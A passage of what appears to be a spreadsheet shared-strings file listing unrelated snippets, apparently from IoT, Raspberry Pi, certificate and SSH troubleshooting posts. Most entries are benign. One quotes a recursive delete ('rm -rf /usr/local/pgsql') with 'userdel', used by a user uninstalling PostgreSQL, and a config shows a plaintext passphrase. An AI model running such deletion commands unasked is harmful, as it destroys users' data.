    <t>That is, the LorixOne can store either the RS256 or ES256 private key and authenticate to Cloud IoT Core via JWTs, while you authenticate devices to the gateway with your existing LoRaWAN security keys.</t>
  </si>
  <si>
    <t>Either no legal protocol could be found in a specification string or the string could not be parsed.</t>
  </si>
  <si>
    <t>Administrators can configure Php2Html to validate each referenced URL in numerous PHP documents.</t>
  </si>
  <si>
    <t>Locks are claimed by calling methods on the lock object.</t>
  </si>
  <si>
    <t>When I try to tokenise it using the strtok() function and print out the first token I get back the whole string, the other tokens are empty.</t>
  </si>
  <si>
    <t>I (hopefully) enabled the "Servo1" with:
private void WriteConfiguration()
{
    // Create configuration mask.</t>
  </si>
  <si>
    <t>If you use PowerShell and for example, use "x509devicetogroup" as the device name in the following command:
You will get the following certificates in your working folder:
Here x509devicetogroup-public.pem and x509devicetogroup-all.pem files are what you need.</t>
  </si>
  <si>
    <t>If you want the other common public key format, a SubjectPublicKeyInfo ASN.1 structure, then keep the pem.Block as you have it and instead use
asn1Bytes, err := x509.MarshalPKIXPublicKey(&amp;key.PublicKey)
I don't know what GCP is expecting but it's almost certainly one or the other.</t>
  </si>
  <si>
    <t>The .NET exception that is thrown when there is an attempt to reference (or use) a null or uninitialized object.</t>
  </si>
  <si>
    <t>According to your code, it seems that you want to create a new device identity using the REST API with HTTP PUT Method.</t>
  </si>
  <si>
    <t>Automatic Login for LightDM
Open the terminal and make first a backup of the file we are going to edit:
Edit now this file:
or
nano /etc/lightdm/lightdm.conf
Uncomment these two lines:
autologin-user=USERNAME
autologin-user-timeout=0
Replace USERNAME with your own username.</t>
  </si>
  <si>
    <t>The quickest method to repair this is to blow away your user profile on the local pc, but you should only do this as a last resort, as you will have to re-import your browser favorites, network drives and e-mail settings.</t>
  </si>
  <si>
    <t>Unless you need to have one for security reasons specific to your setup, remove any registry level certificate you have, and just register the device with the created keys.</t>
  </si>
  <si>
    <t>To get your authentication token you need to visit the following url
While replacing the [ClientID] with the ID you got in the first step and the [callbackuri] with your callback uri.</t>
  </si>
  <si>
    <t>Test condition is an item or event of a component or system that could be verified by one or more test cases, e.g.</t>
  </si>
  <si>
    <t>To create and write a private file to the internal storage:
Call openFileOutput() with the name of the file and the operating mode.</t>
  </si>
  <si>
    <t>I just tried creating the keys and putting them in the .ssh file on the remote server, but when I run my simple shell script of ssh user@domain.net 'ls' and it still prompts me for a password.</t>
  </si>
  <si>
    <t>I'm using the following code:
When I try to run this code under a normal user account and with the write filter enabled the getinstances() method returns Access Denied.</t>
  </si>
  <si>
    <t>I have a couple of  questions for the setup of digital twin  with Lora and Sigfox devices which data are encoded:
how do we get the iothubowner string to create the callback to Lora or Sigfox backend ?</t>
  </si>
  <si>
    <t>The code below added at the end of the for-loop seems to do the job and gives a result similar to what the audacity graph looks like in the question above.</t>
  </si>
  <si>
    <t>This PIN you can edit in Home page of Device Portal like this:
More information about credentials processes in Windows Authentication you can reference here.</t>
  </si>
  <si>
    <t>Logging in into the device mgt provides following post page:
So apparently the template parameters https://%iot.keymanager.host%:%iot.keymanager.https.port%/samlsso are not evaluated properly.</t>
  </si>
  <si>
    <t>The IoT Bridge is an Azure function where you put some JS code to convert your message to a format that IoT Central understands and then it deals with the tokens and eventual device registration.</t>
  </si>
  <si>
    <t>My existing locally hosted server loads its iot identity + credentials like so:
..and I don't commit the private key &amp; cert anywhere.</t>
  </si>
  <si>
    <t>Here are some test case results with this change:
PHP:
Note: there are two UTF-8 question-mark characters at the end of the "decrypt" line.</t>
  </si>
  <si>
    <t>A service account's credentials include a generated email address that is unique, a client ID, and at least one public/private key pair.</t>
  </si>
  <si>
    <t>So, typically, you would do input parameter validation on public methods by explicitly checking the value and then throwing an exception if out of range.</t>
  </si>
  <si>
    <t>The strength of a public-key cryptography system relies on the degree of difficulty (computational impracticality) for a properly generated private key to be determined from its corresponding public key.</t>
  </si>
  <si>
    <t>Riot Games removed some of the  API endpoints and now moved to v4, you can find the new version endpoints here and as for the data dragon version, you can find it here
Example: /lol/summoner/v4/summoners/by-name/{summonerName}
They are also now using encrypted ids now and added another identifier for summoner called puuid
You can join their discord here</t>
  </si>
  <si>
    <t>I have already configured my SSID like this:
In /etc/wpa_supplicant/wpa_supplicant.conf
To recap:
Internet works when I plug in ethernet
I can connect to my local WIFI network
When connected to my local WIFI I can ssh into pi
When connected to my local network, I am unable to access the Internet
Running the most up-to-date Raspbian GNU/Linux 8 (jessie)
What else can I try?</t>
  </si>
  <si>
    <t>Can be found on GitHub
Nuget-Package without Identity-Usage:
Nuget-Package with Identity-Usage: Install-Package TrackerEnabledDbContext.Identity (ASP.NET MVC 5 and above)</t>
  </si>
  <si>
    <t>The JWE
Compact Serialization is a compact, URL-safe representation intended
for space constrained environments such as HTTP Authorization headers
and URI query parameters.</t>
  </si>
  <si>
    <t>I was able to do what you are trying to achieve using the following systemd service file (main modification beeing the "Type=forking"):
Also, as you seem to be using a "fhem" user, ensure this user has sufficient privileges over the required files (I have had to give it write access to the log dir at least)
FYI there is a package in AUR for fhem even thought it lacks this service file.</t>
  </si>
  <si>
    <t>Those commands failed to be recognized:
=&gt; su
Unknown command 'su' - try 'help'
=&gt; reboot bootloader
Unknown command 'reboot' - try 'help'
I found a post on another site for the same issue and had no luck with the recommended solution.</t>
  </si>
  <si>
    <t>Freedns offers a bunch of domain names, from my taste the best ones (or the ones easy to remember) are:
mooo.com
ignorelist.com
Assume that you register: 
  Install inadyn:
Open the url: http://freedns.afraid.org/dynamic/
  Login with your account
  Select the link Direct URL beside .ignorelist.com
  Copy everything from the right of the ?</t>
  </si>
  <si>
    <t>But it requires not only a single certificate for HTTP SSL but also requires the root CA certificate and the private key and I guess it is not possible to add these apart from a single certificate using AT commands on the SIM 800.</t>
  </si>
  <si>
    <t>Microsoft's Managed Add-in Framework (MAF), sometimes called System.Addin, contains types to identify, register, activate, and control add-ins, and to allow add-ins to communicate with a host application.</t>
  </si>
  <si>
    <t>*,*}
backupprefix = .$VERSION
This profile will sync all of /home/user/Documents to the remote server except for the /home/user/Documents/secrets subdirectory, all files with a .tmp extension, and any swap files that vim likes to create.</t>
  </si>
  <si>
    <t>I want to add a unique number (that I can hard-code on the chip) along with the photocell info and send in a format I can read using a digital computer (Arduino).</t>
  </si>
  <si>
    <t>If your ISP uses so called "Carrier Grade NAT" which is increasingly common due to the fact that few IPv4 addresses are now available, you cannot make a connection from the Internet to your local network.</t>
  </si>
  <si>
    <t>*/
DigestAjax.AUTH_HA1 = null;
/**Temporary storage of provided username*/
DigestAjax.UNAUTH_USERNAME = null;
/**
 * If Digest authentication succeeds, username is stored in this value for 
 * future requests.</t>
  </si>
  <si>
    <t>Just to confirm, when you created the SSL key pair, and when you registered the device with the Cloud IoT Core registry, did you match the type of key created with the radio button you registered it with?</t>
  </si>
  <si>
    <t>), then on the GCP Console web page for the device I use the "Add public key" to manually copy/paste the contents of the generated public key file (i.e.</t>
  </si>
  <si>
    <t>I've set the environment variable (GOOGLE_APPLICATION_CREDENTIALS) using this command in Terminal and I am positive that my credentials are working as I've tested on other Google Cloud services.</t>
  </si>
  <si>
    <t>with azure-iothub (1.10.2) - I tried to set http_proxy/https_proxy env variables, to configure globalTunnel with proxy settings, but none of these methods work with the latest releases.</t>
  </si>
  <si>
    <t>At any rate, assuming they can use scli or ssh to run remote *nix commands, the simplest thing would be to add a bunch of executable AppleScripts to the Mac which the Linux box can then remote-execute just as it would any other shell command.</t>
  </si>
  <si>
    <t>For example, the injected code could hook system function calls, or read the contents of password text-boxes, which cannot be done the usual way.</t>
  </si>
  <si>
    <t>os.system("FRAMEBUFFER=/dev/fb0 startx -- :1");
Starts but doesn't use console1
Changes ownership of /home/pi/.Xauthority file so next boot fails.</t>
  </si>
  <si>
    <t>The command I used to install it was: 
sudo apt-get install apache2 php5 libapache2-mod-php5
But whenever I try to save my edited version of the index.html, file it comes up with access denied.</t>
  </si>
  <si>
    <t>Either the component that raises this event is not installed on your local computer or the installation is corrupted.</t>
  </si>
  <si>
    <t>It is expected behaviour for the parser to return the default value for a variable if the key is not present, which would be the 0 I am seeing, I even if I verify that the key is present with  it still returns 0.</t>
  </si>
  <si>
    <t>You can disable all unsolicited result by the following AT command:
To enable it back just change 0 to 1:</t>
  </si>
  <si>
    <t>The following steps are how I set up my vnc server whenever I get a new pi/re-setup an old one:
x11vnc -storepasswd then enter your password, skip if you don't want one
cd /home/pi/.config
If there is an autostart folder, cd autostart.</t>
  </si>
  <si>
    <t>Once I deleted all resources I returned to the wizard, created yet another cert &amp; key pair, pushed the Lambda code, and everything works.</t>
  </si>
  <si>
    <t>now expects the parameters in a Lua table: https://nodemcu.readthedocs.io/en/latest/en/modules/wifi/#wifistaconfig
As many other functions in NodeMCU wifi.sta.config is non-blocking.</t>
  </si>
  <si>
    <t>The Point-to-Point Tunneling Protocol (PPTP) is a method for implementing virtual private networks.</t>
  </si>
  <si>
    <t>Inheriting from ID3DXBaseMesh, the ID3DXMesh adds functionality for Locking, Unlocking, and Setting Mesh Attributes.</t>
  </si>
  <si>
    <t>If the thread does not lock on the object's monitor yet the object invokes the notify, notifyAll, or wait method, an IllegalMonitorStateException will be thrown.</t>
  </si>
  <si>
    <t>I'm using assumeRole with Lambda in a role with the following inline policy:
Note: I've added ec2 permissions to try a secondary (simplified) test.</t>
  </si>
  <si>
    <t>In v2.0, all calls to endpoints now require an access token, except for calls to get an object's picture.</t>
  </si>
  <si>
    <t>The RPi must decrypt this string, parse the XML and perform the corresponding action.</t>
  </si>
  <si>
    <t>When I run the server and navigate to one of the 3 actions, I always get this error:
I am new to ruby on rails but what I've already tried is to comment out the "protect_from_forgery with: :exception" line on my ApplicationController.</t>
  </si>
  <si>
    <t>I tried resetting the 3G module via the reset pin, but the module cannot register any more into the network.</t>
  </si>
  <si>
    <t>I have tested the sim card is registered with the network using another dev kit and sending text msgs from it.</t>
  </si>
  <si>
    <t>Are there any good ways to use Python and send emails without having to keep my password as plain text?</t>
  </si>
  <si>
    <t>Setup PPTP to access home network transparently
I have Raspberry Pi box connected to home WiFi-router and running .</t>
  </si>
  <si>
    <t>The problem I'm having is figuring out how to ssh into my pi using swift, and then, once I've ssh'd into it, sending commands to the pi.</t>
  </si>
  <si>
    <t>When I try to run the tests from test explorer however, I get:
Error : DEP0700 : Registration of the app failed.</t>
  </si>
  <si>
    <t>ETA:  I should note that username:password@192.168.1.50/rest/vars/get/1/12 does work when called from an incognito browser, so it should be possible to make the call from the ESP8266.</t>
  </si>
  <si>
    <t>How do you run a node-red exec block with root privileges?</t>
  </si>
  <si>
    <t>Using esp8266 as an access point so that the other mobiles could connect with the esp8266, Want to get the client's info like ip, mac and rssi, this could be done by the command AT+CWLAP.</t>
  </si>
  <si>
    <t>here is my code....i dont whats wrong with my code....error of identification line 161...
exatly error like this....line 161....Indentation Error: unindent does not match any outer indentation level
help
help
help</t>
  </si>
  <si>
    <t>I just want to be able to connect HTTPS to my containers, just in local with let's encrypt (I use raspberrypi.local domain).</t>
  </si>
  <si>
    <t>A call to node.bootreason() returns 2, 3 after a random reboot, indicating a software watchdog reset.</t>
  </si>
  <si>
    <t>I can ssh into each station but I don't know how to send keypress/gpio signals through the command line to a running pygame script..</t>
  </si>
  <si>
    <t>Where they are actually storing the certificate or the private key in  and passing those in IoTHubClient_LL_SetOption() function along with the IotHub Client Handle.</t>
  </si>
  <si>
    <t>When I try to send my string and I verify it on arduino it won't pass any of the if statements.</t>
  </si>
  <si>
    <t>Let me know if anyone has tried this or had any successes with captive portals using systemd networking on Stretch.</t>
  </si>
  <si>
    <t>I do have a shebang at the beginning of my js file : #!/usr/bin/env node
These are the lines which are printed to the syslog:
Nov 18 20:20:05 raspberrypi cron[331]: (CRON) INFO (pidfile fd = 3)
Nov 18 20:20:05 raspberrypi cron[331]: (CRON) INFO (Running @reboot jobs)
And in auth.log:
Nov 18 20:20:05 raspberrypi systemd-logind[309]: New seat seat0.</t>
  </si>
  <si>
    <t>I have this user verification file:
I send the user a mail and then use GET method to retrieve the info.</t>
  </si>
  <si>
    <t>What I think I want:
I would like the slave units to have some way of automatically discover the master unit's IP.</t>
  </si>
  <si>
    <t>I have installed all modules referenced in the servo hat documentation and "i2cdetect" has verified that the hat is properly connected.</t>
  </si>
  <si>
    <t>I am trying to enable a static pin/password authentication entry for devices that are trying to connect to my raspberry pi.</t>
  </si>
  <si>
    <t>The code:  
I added permissions to Package.appxmanifest:
When I reach the code, application just shutting down, and default Hello World application is appear.</t>
  </si>
  <si>
    <t>My idea was to get the details of the End-Device using network discovery, gets it network ID (NI) and then send a command to the device.</t>
  </si>
  <si>
    <t>The call to register a device to IoTCentral returns an exception, but the device does become visible in the web app (under Unassociated Devices).</t>
  </si>
  <si>
    <t>So, I installed OpenSSH on my iPhone via Cdyia and ssh to my iphone and I can open and read tty.iap via command line(as root) but not via my application.</t>
  </si>
  <si>
    <t>Then from the command line you could easily un-block the program by doing:
$ kill &lt;program-pid&gt; -SIGUSR1</t>
  </si>
  <si>
    <t>Put this at the top of the file that executes the SQL commands and it will enable foreign keys on runtime.</t>
  </si>
  <si>
    <t>And you should not use the normal string formating with DB queries for security reason (SQL injections).</t>
  </si>
  <si>
    <t>I have not tested that specific version, but Ive heard that it works with test certificates but not purchased certificates.</t>
  </si>
  <si>
    <t>A better way to do this would be to use the fact that an invalid character given so , parsing stops.</t>
  </si>
  <si>
    <t>Calling WiFi.softAPdisconnect(true);
just before WiFi.begin(Ssid, Password);
solved the problem.</t>
  </si>
  <si>
    <t>Using ssh putty program put the address as
raspberrypi.local
Log and in and you can access the terminal.</t>
  </si>
  <si>
    <t>You should be using the bridge_cafile or bridge_capath to point to a the CA certificate that signed the Watson IoT certificate so the local broker can verify that the remote end is who they say they are.</t>
  </si>
  <si>
    <t>After unmounting the SD card and putting it back into a Pi the SSH service
should start fine after boot.</t>
  </si>
  <si>
    <t xml:space="preserve"> doesn't pass all of your environment variables to the command it runs (primarily for security reasons).</t>
  </si>
  <si>
    <t>But it could be that the error isn't logged because of the complicated setup where  calls screen that calls bash to run Python.</t>
  </si>
  <si>
    <t>By sticking sudo in front of the command, the first password it will prompt for would be your local users one (to authenticate against the sudoers list).</t>
  </si>
  <si>
    <t>The default WiFi settings activity has been removed in recent previews.</t>
  </si>
  <si>
    <t>After you have configured it properly, you are able to run a command on your server:
and will execute  on the Raspberry PI, without being prompted for a password.</t>
  </si>
  <si>
    <t>As others pointed, solution you are looking for is exposing your local port to public.</t>
  </si>
  <si>
    <t>Based on the error message, it appears that the  you're providing in the command line is not the same id as the project that you logged in with.</t>
  </si>
  <si>
    <t>"Physical access is total access"... once you put it in the customer's hands, you're looking at deterrents more than absolutes.</t>
  </si>
  <si>
    <t>The problem is that you're misusing the address returned by mmap(), which BTW you fail to validate.</t>
  </si>
  <si>
    <t>If access were to occur, the raspberry pi could probably be compromised, and from there, the IoT devices in the home, other private services, etc are at risk too.</t>
  </si>
  <si>
    <t>Then  to start sshd and add a wpa_supplicant file to boot partition so your WiFi can connect.</t>
  </si>
  <si>
    <t>A token can look like anything that is useful for processing an input text stream or text file.</t>
  </si>
  <si>
    <t>It holds your private keys in memory, already decoded, so that you can use them often without needing to type a passphrase</t>
  </si>
  <si>
    <t>X.509 specifies standard formats for certificates, revocation lists, attribute certificates, and path validation.</t>
  </si>
  <si>
    <t>Recent browsers allows connection to private ftp sites.</t>
  </si>
  <si>
    <t>It does this by placing a soap call to your application, authenticating, and then processing calls via a queue you establish.</t>
  </si>
  <si>
    <t>Zulu has been verified by passing all tests in the Java SE 7 version of the OpenJDK Community TCK (Technology Compatibility Kit).</t>
  </si>
  <si>
    <t>You will need to specify a URL within your checkout process where PayPal needs to return your users after they have authenticated with PayPal.</t>
  </si>
  <si>
    <t>If a user who's subject to a hold deletes data, it's removed from the user's view, but the data is preserved in Vault.</t>
  </si>
  <si>
    <t>Hibernate Validator is the reference implementation for JSR 380 - Bean Validation 2.0 which defines an API and model for JavaBean validation.</t>
  </si>
  <si>
    <t>Domain names can also be private within a network, and a computer may also maintain its own local "hosts" file.</t>
  </si>
  <si>
    <t>Suitable for integration into Spring-based applications and also transparently integrable with Spring Security.</t>
  </si>
  <si>
    <t>Storing a password should never be done in plain text, this means that the passwords are stored exactly as they were typed by the user.</t>
  </si>
  <si>
    <t>If the master page exposes public properties or methods (e.g.</t>
  </si>
  <si>
    <t>The restricted mode is
incompatible with SandboxConfig "traceback" feature and allowPath() method.</t>
  </si>
  <si>
    <t>The network is just a home network with local user credentials, share is on another computer on the same network.</t>
  </si>
  <si>
    <t>Equally the public Multipeer connectivity API and private BluetoothManager are also not suitable, the former is for iOS devices only.</t>
  </si>
  <si>
    <t>&gt;&gt;&gt; a = 000127
  File "&lt;stdin&gt;", line 1
    a = 000127
             ^
SyntaxError: invalid token
&gt;&gt;&gt; 
You can read the rationale behind these decisions in PEP 3127.</t>
  </si>
  <si>
    <t>Take a look at https://ngrok.com/ which will give you a url that is public and is being 'tunneled' to your Pi.</t>
  </si>
  <si>
    <t>An ASCII encoder commonly replaces invalid codes like this with a question mark.</t>
  </si>
  <si>
    <t>You shouldn't need 'sudo' because the  in mysql -u root specifies the user account with which to connect (and the 'mysql' command should be available for all users, not just root; if not check your path).</t>
  </si>
  <si>
    <t>AWS IoT uses the SHA-256 hash of a device certificate in the binary  format (not in the PEM textual format) to determine its certificateId.</t>
  </si>
  <si>
    <t>The default UTF-8 encoding for this constructor throws an exception on invalid bytes.</t>
  </si>
  <si>
    <t>If both are signed, the full public key must be included in the constructor of the attribute.</t>
  </si>
  <si>
    <t>A keystore is a database of private keys and their associated X.509 certificate chains authenticating the corresponding public keys.</t>
  </si>
  <si>
    <t>References
User Defined Access Keys
How to find in which map a key binding is from programmatically in Emacs
Remap keys in OS X</t>
  </si>
  <si>
    <t>That carrier is the pfx file that includes the public key, the private key, and attached certificates and identities accompanying them.</t>
  </si>
  <si>
    <t>Digging has revealed that error 22 from ioctl is an invalid argument.</t>
  </si>
  <si>
    <t>Note that a client X's certificate contains X's public key signed by CA's private key.</t>
  </si>
  <si>
    <t>An anonymous method in C# is a way to pass a code block as a delegate parameter.</t>
  </si>
  <si>
    <t>in that reason, is it even better to give these devices a public key than a private key?</t>
  </si>
  <si>
    <t>But when I try to do password-less login using my private key in Putty, I get the following error:
Using username "pi".</t>
  </si>
  <si>
    <t>I have a Cognito Identity Pool that is used to authenticate my front end users, as well as give them certain permissions in my application.</t>
  </si>
  <si>
    <t>We are adding the wifi credentials to /etc/wpa_supplicant/wpa_supplicant.conf file.</t>
  </si>
  <si>
    <t>I am also having confusion as to where does the public/private keys resides (windows server or Linux client)?</t>
  </si>
  <si>
    <t>Or may be there is some more convinient way/method to pass encrypted messages between Arduino and PHP?</t>
  </si>
  <si>
    <t>If you'd like to do sudo node, you can add the PATH to Defaults secure_path using sudo visudo.</t>
  </si>
  <si>
    <t>Such a coding error can result in a bus error when the location is actually invalid.</t>
  </si>
  <si>
    <t>PKCS#12 is a file format to store and exchange private keys and certificates.</t>
  </si>
  <si>
    <t>If the mode allows writing, the security manager's checkWrite method is also called with the name argument as its argument to see if write access to the file is allowed.</t>
  </si>
  <si>
    <t>PKCS #12 (Personal Information Exchange Syntax Standard) is the most commonly used format for  private keys and X.509 certificates.</t>
  </si>
  <si>
    <t>Therefore I have created a PUT-Webservice with windows authentication.</t>
  </si>
  <si>
    <t>Now I want to read the string, tokenize it and save it to an char array.</t>
  </si>
  <si>
    <t>i use "nodm" (as package in Debian or from here: http://www.enricozini.org/sw/nodm/) on my Raspberry to login my user and start LXDE.</t>
  </si>
  <si>
    <t>If you want to run at login do the same thing but edit your .bashrc file instead.</t>
  </si>
  <si>
    <t>It can't do anything about permissions or creating network paths to internal servers.</t>
  </si>
  <si>
    <t>If Password tries to change "1234" into something else, the results are undefined.</t>
  </si>
  <si>
    <t>The format can be any string that is valid in the MQTT protocol.</t>
  </si>
  <si>
    <t>It looks like you are missing to link against libssl and libcrypto</t>
  </si>
  <si>
    <t>Upload the files to /home/pi and connect with ssh.</t>
  </si>
  <si>
    <t>For example: 12345678.txt is valid, 123456789.txt would be invalid.</t>
  </si>
  <si>
    <t>I ended up unregistering the receiver in its own receive().</t>
  </si>
  <si>
    <t>The API uses OAuth 1.0a for authentication and returns all requested data in JSON format.</t>
  </si>
  <si>
    <t>I tried to add a call to "sudo chmod" in this file to get permissions but it doesn't work.</t>
  </si>
  <si>
    <t>Cryptojacking is a recent trend (since end of 2017).</t>
  </si>
  <si>
    <t>I installed php and php-mysql
But my php script throw an error, stating myscli class is not available
Here is the really simple line causing the error : 
// Create connection
$conn = new mysqli($host, $user, $password, $db);
Here is a the php -i grep : 
&gt;php -i | grep mysql
Additional .ini files parsed =&gt; /etc/php/7.0/cli/conf.d/10-mysqlnd.ini,
/etc/php/7.0/cli/conf.d/20-mysqli.ini,
/etc/php/7.0/cli/conf.d/20-mysqlnd.ini,
/etc/php/7.0/cli/conf.d/20-pdo_mysql.ini,
pi@valrb2:~ $
I tried : 
reload/restart apache2
reboot
Removing / Installing again php / php-mysql
Nothing works.</t>
  </si>
  <si>
    <t>There are several typical approaches to filling the ModuleCatalog with ModuleInfo instances:
Registering modules in code
Registering modules in XAML
Registering modules in a configuration file (WPF only)
Discovering modules in a local directory on disk (WPF only)
The registration and discovery mechanism you should use depends on what your application needs.</t>
  </si>
  <si>
    <t>However, semver relies on package developers not making mistakes  breaking changes or new bugs may find their way into installed dependencies if the dependencies are not locked down.</t>
  </si>
  <si>
    <t>Adding this line should do the trick:
where xxxxxxxxxxxxxxxxxxxx is Base64 encoded (more precisely RFC2045-MIME variant of Base64 is used, except not limited to 76 char/line) username and password.</t>
  </si>
  <si>
    <t>PowerForms add key capabilities to your existing editable PDFs:
You can distribute PowerForms via email or the web with a unique, secure URL automatically generated by DocuSign.</t>
  </si>
  <si>
    <t>Here are the steps I'm following:
1) I guess my HC-05 called FOO is recognised and properly configured, because 
reports
xx are just a mask I use here for privacy.</t>
  </si>
  <si>
    <t>I think this is a protection behavior, but i'd like to insert a curl command which sends a sms before shutdown, like "power loss and connexion failure with ups"
(i know the command itself, this is not the problem)
I know I must add something like "DEADTIME" or "NOTIFYFLAG NOCOMM" or "COMMBAD" in upsmon.conf, but not sure what to choose...
And what do i have to add in my "notifycmd" file ?</t>
  </si>
  <si>
    <t>For the case of nested/re-entrant critical sections, the intrinsics provide a handy int __disable_irq(void) form which returns the previous state, so you can unmask conditionally on that.</t>
  </si>
  <si>
    <t>To make the change permanent, you can either add the alias setting to the startup file of your shell (the file .profile in your home directory), or better, change the links.</t>
  </si>
  <si>
    <t>A Spring application with a real world user module having features like signup, login, email verification, forgot password, show profile and edit profile.</t>
  </si>
  <si>
    <t>This command usually follows testing a computer's Fully Qualified Domain Name (FQDN) host name resolution, where the computer's Internet Protocol (IP) address is located and verified.</t>
  </si>
  <si>
    <t>urllib2 is a module that defines functions and classes to help with URL actions (basic and digest authentication, redirections, cookies, etc).</t>
  </si>
  <si>
    <t>When I log in on my Raspberry Pi I get this login message:
To display the Uptime and so on I use a script which is executed in /etc/profile, but where is the command located to display the second line with "No mail."?</t>
  </si>
  <si>
    <t>I have imported the WSO2 IoT server Connected Cup sample device agent into Eclipse IDE, and disable device authentication for MQTT broker for easy of testing purpose.</t>
  </si>
  <si>
    <t>A login page is the first step in user authentication and acts as a gateway between the public version of an application and it's private back end</t>
  </si>
  <si>
    <t>Due to the logical limitations of security testing, passing security testing is not an indication that no flaws exist or that the system adequately satisfies the security requirements.</t>
  </si>
  <si>
    <t>This is why this post suggests to replace it with the PyCryptodome library, which still creates a  package with an almost identical API and can be used with most software, although there are some exceptions.</t>
  </si>
  <si>
    <t>It successfully compiled for my X86  CPU with gcc encoder.c -lcrypto -o encoder (I'd installed libssl-dev), but when I want to cross compile it (with arm-linux-gnueabihf-gcc), this error occur:
How to cross compile an openssl C application for Raspberry Pi?</t>
  </si>
  <si>
    <t>However, I noticed that as soon as I set the certificate on the gateway, all modules installed (except for the Agent and the edgeHub) on the Gateway stopped functioning (even with the sample tempSensor).</t>
  </si>
  <si>
    <t xml:space="preserve">
If I'm not mistaken (can't test it here), you are not sending  at the end of root and the password (ser.write() does not add them as print() does), so you are not logging in correctly.</t>
  </si>
  <si>
    <t>So the problem at first was "pygame.error: video system not initialized", though I think i got it fixed by setting an env variable:
Now that I got it working I run it...and nothing happens, like no keystrokes are registered.</t>
  </si>
  <si>
    <t>I also know about Microsoft's tool called Not my fault, but it's an .exe file, not an UWP .appx package that I could easily run on Windows 10 IoT Core system.</t>
  </si>
  <si>
    <t>This is manual:
Follow the manual, when I write hex string = EF01FFFFFFFF010003010005 (Address default = FFFFFFFF), the fingerprint will response ACK package.</t>
  </si>
  <si>
    <t>I tried these command which I found online:
rm -rf /usr/local/pgsql
userdel postgres
The first one after key in it is not showing any respond while the second one i get permission denied message.</t>
  </si>
  <si>
    <t>y = y + 1
The script would ideally ask for the username/password, open Firefox, open the first URL, insert the credentials, open the second URL, etc etc...</t>
  </si>
  <si>
    <t>What you're trying to do is as simple as setting a global bool; try creating a bool that you'll access and set to false once the password has been entered.</t>
  </si>
  <si>
    <t>For example: 
You can then modify the earlier code example to call this function prior to using the client certificate in order to ensure the application has access to the certificate private key.</t>
  </si>
  <si>
    <t>You can create an index for uniqueness on these two fields, which will prevent multiple entries from being inserted into the database.</t>
  </si>
  <si>
    <t>BTW It used ignas's source code (the OP sourcecode was not readble without registration, and I don't want to registrate)
EDIT: I copied the fragment below from wakkerbot, and edited it a bit.</t>
  </si>
  <si>
    <t>It does not hold locks on any records while the user is editing, but checks to see if any other edits have occurred when the user tries to commit the changes.</t>
  </si>
  <si>
    <t>Using XmlDocument.Load with a string containing XML will lead to the common "Data at the root level is invalid" exception.</t>
  </si>
  <si>
    <t>I have installed the following X packages:
xorg-server,
xorg-xinit
xorg-twm, xterm
and for the graphics: xf86-video-fbdev
I have also added a user and password, and altered the sudoers file to suit.</t>
  </si>
  <si>
    <t>for the second issue, as what aws does, the private key is send to the user,that also means we have to ensure the private key given to the user/device securely.</t>
  </si>
  <si>
    <t>However if I send:
{
  'item': 'temperature',
  'data': '25.00'
}
as the payload - I get the error:
{"error":{"text":SQLSTATE[23000]: Integrity constraint violation: 1048 Column 'item' cannot be null}}
--</t>
  </si>
  <si>
    <t>The problems is, if I comment out the date and time data, the server could identify the package as valid.</t>
  </si>
  <si>
    <t>To get the sample work enable the following capabilities in the Package.appxmainifest:
Internet (Client) and Microphone
Edit
Like Eric Brown said RecognizeWithUIAsync seems not to work with Windows IoT (I rememberd not correctly, it seems to be I never used RecognizeWithUIAsync but I know SpeechRecognizer works in past).</t>
  </si>
  <si>
    <t>Attach the Certificate to the HttpBaseProtocolFilter and add the filter to the HttpClient
Call the HttpClient.PostAsync
After I call PostAsync I get the following error: An Error Occurred in the Secure Channel Support.</t>
  </si>
  <si>
    <t>I want to set the default keyboard to U.S., disable auto-login and boot to command line rather than GUI.</t>
  </si>
  <si>
    <t>folderPicker.PickSingleFolderAsync() return null:
this throw a fileNotFountException:
the codes work in debug x86 (windows 10 App), but dont on the ARM(RT) (Windows 10 IOT)
As i can understand, they are some limitation for security.</t>
  </si>
  <si>
    <t>I included all packages and verify as they had mentioned to check at specific path.</t>
  </si>
  <si>
    <t>Once the Gateway is initialized it receives it's messages using this method:
I feel like this would be the best place to unwrap any batched messages.</t>
  </si>
  <si>
    <t>Having trouble testing getting past 401 in azure-iot-hub with manual SAS key generation via connection string in a javascript (typescript) file using the forge javascript library.</t>
  </si>
  <si>
    <t>Having plain connection (MQTT or HTTP) a static password is out of question.</t>
  </si>
  <si>
    <t>Knowing that the implementation is private, can anyone conceptually explain how the gateway is able to push messages to a device on my local network?</t>
  </si>
  <si>
    <t>Consecutive call to LockBuffer() on the same SoftwareBitmap object raises exception:
Platform::AccessDeniedException ^ at memory location 0x00000002CEEFDCC0.</t>
  </si>
  <si>
    <t>However, if I don't make the pairing between two devices through the bluetoothctl, I can't use the client because it gives me error: 
uh oh: Invalid exchange.</t>
  </si>
  <si>
    <t>For more info here is the hostapd.conf file:
interface=wlan0
#driver=nl80211
ssid=Coriolis
country_code=CA
hw_mode=g
channel=6
wmm_enabled=0
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_passphrase=password123
wpa_key_mgmt=WPA-PSK
wpa_group_rekey=86400
ieee80211n=1
wpa_pairwise=TKIP
rsn_pairwise=CCMP
wme_enabled=1
sorry about the indentation inside some of the code snippets, using the {} code button puts this in and I can't seem to get rid of it without removing the code formatting.</t>
  </si>
  <si>
    <t>When i use the openVPN client on an Android device it works perfectly but when i use tunnelblick on mac it changes my ip public address successfuly but i do not see my local VPN devices.</t>
  </si>
  <si>
    <t>The log line is:
x509_verify_cert() returned -9984 (-0x2700)
Which translates to an MBEDTLS_ERR_X509_CERT_VERIFY_FAILED error
I've tried different supplying different certificates(Baltimore CyberTrust Root, Microsoft IT TLS CA 1, using the certificate that gets sent to verify) but all of them fail with the same error.</t>
  </si>
  <si>
    <t>I am quite new to sniffing/hacking and trying to do a nice script for parsing/sorting packages.</t>
  </si>
  <si>
    <t>So I tried to validate it before use the extern method, something like this:
and the external method is:
And it throw me DllNotFoundException, EVEN WITH THE PREVIOUS VALIDATION!!!</t>
  </si>
  <si>
    <t>I asked this question on RaspberryPi Stack Exchange site, and @hildred had a beautiful solution for this:
Write these few lines to *:
And these few lines to ~/.bashrc:
if [ -z "$XAUTHORITY" ]; then
    if [ -e $HOME/.Xauthority ]; then
        export XAUTHORITY=$HOME/.Xauthority;
    fi;
fi
**On a Raspbian this will be etc/sudoers.d/README for example*</t>
  </si>
  <si>
    <t>The signature for PiCamera.capture is defined as
